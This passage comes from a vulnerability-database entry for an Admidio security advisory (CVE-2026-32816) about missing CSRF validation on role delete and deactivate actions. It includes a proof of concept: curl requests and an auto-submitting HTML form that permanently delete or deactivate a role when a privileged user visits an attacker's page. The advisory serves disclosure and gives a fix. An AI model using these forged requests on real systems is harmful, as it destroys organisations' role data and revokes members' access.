role\n$sql = \u0027UPDATE \u0027 . TBL_EVENTS . \u0027 SET dat_rol_id = NULL WHERE dat_rol_id = ?\u0027;\n$this-\u003edb-\u003equeryPrepared($sql, array($rolId));\n\n// Remove all access-right entries for this role\n$sql = \u0027DELETE FROM \u0027 . TBL_ROLES_RIGHTS_DATA . \u0027 WHERE rrd_rol_id = ?\u0027;\n$this-\u003edb-\u003equeryPrepared($sql, array($rolId));\n```\n\nThere is no soft-delete or recycle bin. Deletion permanently removes the role record, all memberships within it, all role dependency rules, and all per-module access rights granted to the role.\n\n## PoC\n\nThe attacker hosts the following HTML page and tricks a user with the `rol_assign_roles` right into visiting it while logged in to Admidio.\n\n**Step 1: Collect role UUIDs from the public cards view (no login required)**\n\n```\ncurl \"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=cards\"\n```\n\nRole UUIDs appear in the HTML source as element IDs (`id=\"role_\u003cUUID\u003e\"`) and in action data attributes.\n\n**Step 2: Forge a deletion request (no CSRF token needed)**\n\n```\ncurl -X POST \\\\\n  \"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete\u0026role_uuid=ROLE_UUID\" \\\\\n  -H \"Cookie: ADMIDIO_SESSION_ID=victim_session\" \\\\\n  -d \"\"\n```\n\nExpected response: `{\"status\":\"success\"}`\n\nThe role, all its memberships, all event associations, and all access-right entries are permanently deleted. No `adm_csrf_token` field is required.\n\n**Step 3 (CSRF delivery -- attacker hosts externally)**\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003cbody onload=\"document.getElementById(\u0027f\u0027).submit()\"\u003e\n  \u003cform id=\"f\" method=\"POST\"\n        action=\"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete\u0026role_uuid=ROLE_UUID\"\u003e\n    \u003c!-- No adm_csrf_token field needed --\u003e\n  \u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\nWhen any user with `rol_assign_roles` views this page while authenticated, the targeted role is permanently deleted without any confirmation from the victim.\n\n**Step 4 (Deactivate via CSRF -- disables a role without deleting it)**\n\n```html\n\u003cform id=\"f\" method=\"POST\"\n      action=\"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=deactivate\u0026role_uuid=ROLE_UUID\"\u003e\n\u003c/form\u003e\n```\n\nDeactivating a role removes all active members from the role and hides it, effectively revoking access for all members without destroying the role record.\n\n## Impact\n\n- **Permanent Role Deletion:** A CSRF-triggered `delete` request irrecoverably removes the targeted role and all associated memberships, event links, and permission grants. There is no undo path other than a database restore.\n- **Mass Membership Revocation:** Every member of the deleted role loses their membership record simultaneously. Role membership in Admidio controls access to events, document folders, mailing lists, and custom profile-field visibility.\n- **Role State Manipulation:** An attacker can force `activate` or `deactivate` on any role. Deactivation silently strips access from an entire group without deleting the role record.\n- **Low Attack Surface Requirement:** The attacker only needs to trick a user with the delegated `rol_assign_roles` right -- not a full system administrator. Such users are common in organizations that delegate group management to department heads or committee chairs.\n- **UUID Pre-Collection Without Authentication:** Role UUIDs are harvested from the public cards view before the CSRF attack is staged, making target selection trivial.\n\n## Recommended Fix\n\nAdd `SecurityUtils::validateCsrfToken($_POST[\"adm_csrf_token\"])` at the beginning of each vulnerable case, consistent with how other mutative actions in the codebase are protected.\n\n```php\n// File: modules/groups-roles/groups_roles.php\n\ncase \u0027delete\u0027:\n    SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n    $role = new Role($gDb);\n    $role-\u003ereadDataByUuid($getRoleUUID);\n    if ($role-\u003edelete()) {\n        echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027));\n    }\n    break;\n\ncase \u0027activate\u0027:\n    SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n    $role = new Role($gDb);\n    $role-\u003ereadDataByUuid($getRoleUUID);\n    $role-\u003eactivate();\n    echo \u0027done\u0027;\n    break;\n\ncase \u0027deactivate\u0027:\n    SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n    $role = new Role($gDb);\n    $role-\u003ereadDataByUuid($getRoleUUID);\n    $role-\u003edeactivate();\n    echo \u0027done\u0027;\n    break;\n```\n\nSince `callUrlHideElement` already sends `adm_csrf_token` in the POST body, adding the server-side validation call is a one-line fix per case and requires no changes to the front-end JavaScript or templates.",
  "id": "GHSA-wwg8-6ffr-h4q2",
  "modified": "2026-03-20T21:15:34Z",
  "published": "2026-03-16T21:17:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32816"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Admidio/admidio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Admidio is Missing CSRF Validation on Role Delete, Activate, and Deactivate Actions"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-32816 (GCVE-0-2026-32816)

FKIE_CVE-2026-32816

GHSA-WWG8-6FFR-H4Q2

Summary

Details

CSRF Token Is Sent but Never Validated

Client-Side UI Passes Token; Server Ignores It

Who Can Be the CSRF Victim

Role UUIDs Are Discoverable Without Authentication

Role::delete() Is Permanent and Cascading

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature